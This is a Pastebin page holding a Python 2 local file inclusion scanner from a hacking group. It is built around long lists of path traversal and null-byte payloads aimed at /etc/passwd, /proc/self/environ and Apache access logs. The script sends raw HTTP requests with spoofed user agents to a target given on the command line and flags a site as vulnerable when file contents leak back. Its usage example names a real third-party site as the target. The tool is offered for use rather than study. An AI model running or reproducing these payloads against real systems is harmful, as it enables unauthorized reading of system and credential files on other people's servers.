Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- # Author: parkdream1
- # Messenger: h3x4r
- # (c) R00TW0RM - Private Community
- # https://r00tw0rm.com/
- # Local File Include Scaner Ver. 1.1
- # Greets: To all members of r00tw0rm !!
- import socket,sys,re,random,time,httplib
- from random import choice
- passwd = ["/etc/passwd",
- "../etc/passwd",
- "../../etc/passwd",
- "../../../etc/passwd",
- "../../../../etc/passwd",
- "../../../../../etc/passwd",
- "../../../../../../etc/passwd",
- "../../../../../../../etc/passwd",
- "../../../../../../../../etc/passwd",
- "../../../../../../../../../etc/passwd",
- "../../../../../../../../../../etc/passwd",
- "../../../../../../../../../../../etc/passwd",
- "../../../../../../../../../../../../etc/passwd",
- "../../../../../../../../../../../../../etc/passwd",
- "/etc/passwd%00",
- "../etc/passwd%00",
- "../../etc/passwd%00",
- "../../../etc/passwd%00",
- "../../../../etc/passwd%00",
- "../../../../../etc/passwd%00",
- "../../../../../../etc/passwd%00",
- "../../../../../../../etc/passwd%00",
- "../../../../../../../../etc/passwd%00",
- "../../../../../../../../../etc/passwd%00",
- "../../../../../../../../../../etc/passwd%00",
- "../../../../../../../../../../../etc/passwd%00",
- "../../../../../../../../../../../../etc/passwd%00",
- "../../../../../../../../../../../../../etc/passwd%00"]
- environ = ["/proc/self/environ",
- "../proc/self/environ",
- "../../proc/self/environ",
- "../../../proc/self/environ",
- "../../../../proc/self/environ",
- "../../../../../proc/self/environ",
- "../../../../../../proc/self/environ",
- "../../../../../../../proc/self/environ",
- "../../../../../../../../proc/self/environ",
- "../../../../../../../../../proc/self/environ",
- "../../../../../../../../../../proc/self/environ",
- "../../../../../../../../../../../proc/self/environ",
- "../../../../../../../../../../../../proc/self/environ",
- "../../../../../../../../../../../../../proc/self/environ",
- "../../../../../../../../../../../../../../proc/self/environ",
- "/proc/self/environ%00",
- "../proc/self/environ%00",
- "../../proc/self/environ%00",
- "../../../proc/self/environ%00",
- "../../../../proc/self/environ%00",
- "../../../../../proc/self/environ%00",
- "../../../../../../proc/self/environ%00",
- "../../../../../../../proc/self/environ%00",
- "../../../../../../../../proc/self/environ%00",
- "../../../../../../../../../proc/self/environ%00",
- "../../../../../../../../../../proc/self/environ%00",
- "../../../../../../../../../../../proc/self/environ%00",
- "../../../../../../../../../../../../proc/self/environ%00",
- "../../../../../../../../../../../../../proc/self/environ%00",
- "../../../../../../../../../../../../../../proc/self/environ%00"]
- logs = ["/usr/local/apache2/logs/access_log",
- "../usr/local/apache2/logs/access_log",
- "../../usr/local/apache2/logs/access_log",
- "../../../usr/local/apache2/logs/access_log",
- "../../../../usr/local/apache2/logs/access_log",
- "../../../../../usr/local/apache2/logs/access_log",
- "../../../../../../usr/local/apache2/logs/access_log",
- "../../../../../../../usr/local/apache2/logs/access_log",
- "../../../../../../../../usr/local/apache2/logs/access_log",
- "../../../../../../../../../usr/local/apache2/logs/access_log",
- "../../../../../../../../../../usr/local/apache2/logs/access_log",
- "../../../../../../../../../../../usr/local/apache2/logs/access_log",
- "../../../../../../../../../../../../usr/local/apache2/logs/access_log",
- "../../../../../../../../../../../../../usr/local/apache2/logs/access_log",
- "../../../../../../../../../../../../../../usr/local/apache2/logs/access_log",
- "/usr/local/apache2/logs/access_log%00",
- "../usr/local/apache2/logs/access_log%00",
- "../../usr/local/apache2/logs/access_log%00",
- "../../../usr/local/apache2/logs/access_log%00",
- "../../../../usr/local/apache2/logs/access_log%00",
- "../../../../../usr/local/apache2/logs/access_log%00",
- "../../../../../../usr/local/apache2/logs/access_log%00",
- "../../../../../../../usr/local/apache2/logs/access_log%00",
- "../../../../../../../../usr/local/apache2/logs/access_log%00",
- "../../../../../../../../../usr/local/apache2/logs/access_log%00",
- "../../../../../../../../../../usr/local/apache2/logs/access_log%00",
- "../../../../../../../../../../../usr/local/apache2/logs/access_log%00",
- "../../../../../../../../../../../../usr/local/apache2/logs/access_log%00",
- "../../../../../../../../../../../../../usr/local/apache2/logs/access_log%00",
- "../../../../../../../../../../../../../../usr/local/apache2/logs/access_log%00",
- "/var/log/apache2/access.log",
- "../var/log/apache2/access.log",
- "../../var/log/apache2/access.log",
- "../../../var/log/apache2/access.log",
- "../../../../var/log/apache2/access.log",
- "../../../../../var/log/apache2/access.log",
- "../../../../../../var/log/apache2/access.log",
- "../../../../../../../var/log/apache2/access.log",
- "../../../../../../../../var/log/apache2/access.log",
- "../../../../../../../../../var/log/apache2/access.log",
- "../../../../../../../../../../var/log/apache2/access.log",
- "../../../../../../../../../../../var/log/apache2/access.log",
- "../../../../../../../../../../../../var/log/apache2/access.log",
- "../../../../../../../../../../../../../var/log/apache2/access.log",
- "../../../../../../../../../../../../../../var/log/apache2/access.log",
- "/var/log/apache2/access.log%00",
- "../var/log/apache2/access.log%00",
- "../../var/log/apache2/access.log%00",
- "../../../var/log/apache2/access.log%00",
- "../../../../var/log/apache2/access.log%00",
- "../../../../../var/log/apache2/access.log%00",
- "../../../../../../var/log/apache2/access.log%00",
- "../../../../../../../var/log/apache2/access.log%00",
- "../../../../../../../../var/log/apache2/access.log%00",
- "../../../../../../../../../var/log/apache2/access.log%00",
- "../../../../../../../../../../var/log/apache2/access.log%00",
- "../../../../../../../../../../../var/log/apache2/access.log%00",
- "../../../../../../../../../../../../var/log/apache2/access.log%00",
- "../../../../../../../../../../../../../var/log/apache2/access.log%00",
- "../../../../../../../../../../../../../../var/log/apache2/access.log%00",
- "/var/log/httpd/access_log",
- "../var/log/httpd/access_log",
- "../../var/log/httpd/access_log",
- "../../../var/log/httpd/access_log",
- "../../../../var/log/httpd/access_log",
- "../../../../../var/log/httpd/access_log",
- "../../../../../../var/log/httpd/access_log",
- "../../../../../../../var/log/httpd/access_log",
- "../../../../../../../../var/log/httpd/access_log",
- "../../../../../../../../../var/log/httpd/access_log",
- "../../../../../../../../../../var/log/httpd/access_log",
- "../../../../../../../../../../../var/log/httpd/access_log",
- "../../../../../../../../../../../../var/log/httpd/access_log",
- "../../../../../../../../../../../../../var/log/httpd/access_log",
- "../../../../../../../../../../../../../../var/log/httpd/access_log",
- "/var/log/httpd/access_log%00",
- "../var/log/httpd/access_log%00",
- "../../var/log/httpd/access_log%00",
- "../../../var/log/httpd/access_log%00",
- "../../../../var/log/httpd/access_log%00",
- "../../../../../var/log/httpd/access_log%00",
- "../../../../../../var/log/httpd/access_log%00",
- "../../../../../../../var/log/httpd/access_log%00",
- "../../../../../../../../var/log/httpd/access_log%00",
- "../../../../../../../../../var/log/httpd/access_log%00",
- "../../../../../../../../../../var/log/httpd/access_log%00",
- "../../../../../../../../../../../var/log/httpd/access_log%00",
- "../../../../../../../../../../../../var/log/httpd/access_log%00",
- "../../../../../../../../../../../../../var/log/httpd/access_log%00",
- "../../../../../../../../../../../../../../var/log/httpd/access_log%00",
- "/var/log/httpd-access.log",
- "../var/log/httpd-access.log",
- "../../var/log/httpd-access.log",
- "../../../var/log/httpd-access.log",
- "../../../../var/log/httpd-access.log",
- "../../../../../var/log/httpd-access.log",
- "../../../../../../var/log/httpd-access.log",
- "../../../../../../../var/log/httpd-access.log",
- "../../../../../../../../var/log/httpd-access.log",
- "../../../../../../../../../var/log/httpd-access.log",
- "../../../../../../../../../../var/log/httpd-access.log",
- "../../../../../../../../../../../var/log/httpd-access.log",
- "../../../../../../../../../../../../var/log/httpd-access.log",
- "../../../../../../../../../../../../../var/log/httpd-access.log",
- "../../../../../../../../../../../../../../var/log/httpd-access.log",
- "/var/log/httpd-access.log%00",
- "../var/log/httpd-access.log%00",
- "../../var/log/httpd-access.log%00",
- "../../../var/log/httpd-access.log%00",
- "../../../../var/log/httpd-access.log%00",
- "../../../../../var/log/httpd-access.log%00",
- "../../../../../../var/log/httpd-access.log%00",
- "../../../../../../../var/log/httpd-access.log%00",
- "../../../../../../../../var/log/httpd-access.log%00",
- "../../../../../../../../../var/log/httpd-access.log%00",
- "../../../../../../../../../../var/log/httpd-access.log%00",
- "../../../../../../../../../../../var/log/httpd-access.log%00",
- "../../../../../../../../../../../../var/log/httpd-access.log%00",
- "../../../../../../../../../../../../../var/log/httpd-access.log%00",
- "../../../../../../../../../../../../../../var/log/httpd-access.log%00",
- "/var/www/logs/access_log",
- "../var/www/logs/access_log",
- "../../var/www/logs/access_log",
- "../../../var/www/logs/access_log",
- "../../../../var/www/logs/access_log",
- "../../../../../var/www/logs/access_log",
- "../../../../../../var/www/logs/access_log",
- "../../../../../../../var/www/logs/access_log",
- "../../../../../../../../var/www/logs/access_log",
- "../../../../../../../../../var/www/logs/access_log",
- "../../../../../../../../../../var/www/logs/access_log",
- "../../../../../../../../../../../var/www/logs/access_log",
- "../../../../../../../../../../../../var/www/logs/access_log",
- "../../../../../../../../../../../../../var/www/logs/access_log",
- "../../../../../../../../../../../../../../var/www/logs/access_log",
- "/var/www/logs/access_log%00",
- "../var/www/logs/access_log%00",
- "../../var/www/logs/access_log%00",
- "../../../var/www/logs/access_log%00",
- "../../../../var/www/logs/access_log%00",
- "../../../../../var/www/logs/access_log%00",
- "../../../../../../var/www/logs/access_log%00",
- "../../../../../../../var/www/logs/access_log%00",
- "../../../../../../../../var/www/logs/access_log%00",
- "../../../../../../../../../var/www/logs/access_log%00",
- "../../../../../../../../../../var/www/logs/access_log%00",
- "../../../../../../../../../../../var/www/logs/access_log%00",
- "../../../../../../../../../../../../var/www/logs/access_log%00",
- "../../../../../../../../../../../../../var/www/logs/access_log%00",
- "../../../../../../../../../../../../../../var/www/logs/access_log%0",
- "/var/apache2/logs/access_log",
- "../var/apache2/logs/access_log",
- "../../var/apache2/logs/access_log",
- "../../../var/apache2/logs/access_log",
- "../../../../var/apache2/logs/access_log",
- "../../../../../var/apache2/logs/access_log",
- "../../../../../../var/apache2/logs/access_log",
- "../../../../../../../var/apache2/logs/access_log",
- "../../../../../../../../var/apache2/logs/access_log",
- "../../../../../../../../../var/apache2/logs/access_log",
- "../../../../../../../../../../var/apache2/logs/access_log",
- "../../../../../../../../../../../var/apache2/logs/access_log",
- "../../../../../../../../../../../../var/apache2/logs/access_log",
- "../../../../../../../../../../../../../var/apache2/logs/access_log",
- "../../../../../../../../../../../../../../var/apache2/logs/access_log",
- "/var/apache2/logs/access_log%00",
- "../var/apache2/logs/access_log%00",
- "../../var/apache2/logs/access_log%00",
- "../../../var/apache2/logs/access_log%00",
- "../../../../var/apache2/logs/access_log%00",
- "../../../../../var/apache2/logs/access_log%00",
- "../../../../../../var/apache2/logs/access_log%00",
- "../../../../../../../var/apache2/logs/access_log%00",
- "../../../../../../../../var/apache2/logs/access_log%00",
- "../../../../../../../../../var/apache2/logs/access_log%00",
- "../../../../../../../../../../var/apache2/logs/access_log%00",
- "../../../../../../../../../../../var/apache2/logs/access_log%00",
- "../../../../../../../../../../../../var/apache2/logs/access_log%00",
- "../../../../../../../../../../../../../var/apache2/logs/access_log%00",
- "../../../../../../../../../../../../../../var/apache2/logs/access_log%00"]
- user = ['Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))',
- 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)',
- 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)',
- 'Mozilla/5.0 (X11; U; Linux i586; de; rv:5.0) Gecko/20100101 Firefox/5.0',
- 'Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)',
- 'Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0',
- 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; chromeframe/12.0.742.112)',
- 'Opera/9.80 (X11; Linux i686; U; ru) Presto/2.8.131 Version/11.11',
- 'Opera/9.80 (X11; Linux i686; U; es-ES) Presto/2.8.131 Version/11.11',
- 'Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/5.0 Opera 11.11']
- agent = random.choice(user)
- def scanpasswd():
- for lfi in passwd:
- try:
- r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
- r.connect((target, port))
- r.send("GET /"+path+lfi+" HTTP/1.0\r\n")
- r.send("Host: "+target+"\r\n")
- r.send("User-Agent: "+agent+"\r\n\r\n")
- print "[*] Send Request Success"
- print "http://"+target+"/"+path+lfi
- page = r.recv(1024)
- fullpage = ""
- while len(page):
- fullpage = fullpage + page
- page = r.recv(1024)
- r.close()
- except Exception, e:
- print "[-] Cant Not Send Request"
- print e
- sys.exit(1)
- r00t = re.search("root:x:0:0:",fullpage)
- if r00t:
- print "\033[32m[*] Request Vulnerability\n"
- sys.exit(1)
- else:
- print "[-] Request Is Not Vulnerability\n"
- time.sleep(1)
- def scanenviron():
- for lfi1 in environ:
- try:
- r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
- r.connect((target, port))
- r.send("GET /"+path+lfi1+" HTTP/1.0\r\n")
- r.send("Host: "+target+"\r\n")
- r.send("User-Agent: "+agent+"\r\n\r\n")
- print "[*] Send Request Success"
- print "http://"+target+"/"+path+lfi1
- page = r.recv(1024)
- fullpage = ""
- while len(page):
- fullpage = fullpage + page
- page = r.recv(1024)
- r.close()
- except Exception, e:
- print "[-] Cant Not Send Request"
- print e
- sys.exit(1)
- r00t = re.search("HTTP_HOST",fullpage)
- if r00t:
- print "\033[32m[*] Request Vulnerability\n"
- sys.exit(1)
- else:
- print "[-] Request Is Not Vulnerability\n"
- time.sleep(1)
- def scanlogs():
- conn = httplib.HTTPConnection(target)
- conn.request("HEAD","/")
- for lfi2 in logs:
- try:
- r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
- r.connect((target, port))
- r.send("GET /"+path+lfi2+" HTTP/1.0\r\n")
- r.send("Host: "+target+"\r\n")
- r.send("User-Agent: "+agent+"\r\n\r\n")
- print "[*] Send Request Success"
- print "http://"+target+"/"+path+lfi2
- page = r.recv(1024)
- fullpage = ""
- while len(page):
- fullpage = fullpage + page
- page = r.recv(1024)
- r.close()
- except Exception, e:
- print "[-] Cant Not Send Request"
- print e
- sys.exit(1)
- r00t = re.search("HEAD / HTTP/1.1",fullpage)
- if r00t:
- print "\033[32m[*] Request Vulnerability\n"
- sys.exit(1)
- else:
- print "[-] Request Is Not Vulnerability\n"
- time.sleep(1)
- def menu():
- print "Menu:\n"
- print "ID [1]"
- print "[Scan /etc/passwd File]\n"
- print "ID [2]"
- print "[Scan Environ File]\n"
- print "ID [3]"
- print "[Scan Access Logs File]\n"
- print "ID [4]"
- print "[Exit]\n"
- mess = raw_input("[*] Select ID For Start Scanner :")
- if mess == "1":
- print "Scan /etc/passwd File Starting ...\n"
- scanpasswd()
- sys.exit(1)
- if mess == "2":
- print "Scan /proc/self/environ File Starting ...\n"
- scanenviron()
- sys.exit(1)
- if mess == "3":
- print "Scan Access Logs File Starting ...\n"
- scanlogs()
- sys.exit(1)
- if mess == "4":
- print "Exiting..."
- sys.exit(1)
- else:
- print "Unknow Command\n"
- print "Please rechoice ID\n"
- menu()
- def banner():
- print "\n"
- print "****************************************************************************"
- print "|| Local File Include Scaner Ver. 1.1 ||"
- print "|| by parkdream1 ||"
- print "|| (c) R00TW0RM - Private Community ||"
- print " Fucking from "+target+" on port "+str(port)
- print "****************************************************************************"
- print "\n"
- if __name__ == '__main__':
- if len(sys.argv) != 4:
- print >>sys.stderr, "Usage:", sys.argv[0], "<Target IP> <Port> <Path>"
- print "Example: python", sys.argv[0], "playerstage.sourceforge.net 80 "+'"index.php?src="'
- sys.exit(1)
- target, port, path = sys.argv[1], int(sys.argv[2]), sys.argv[3]
- banner()
- menu()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement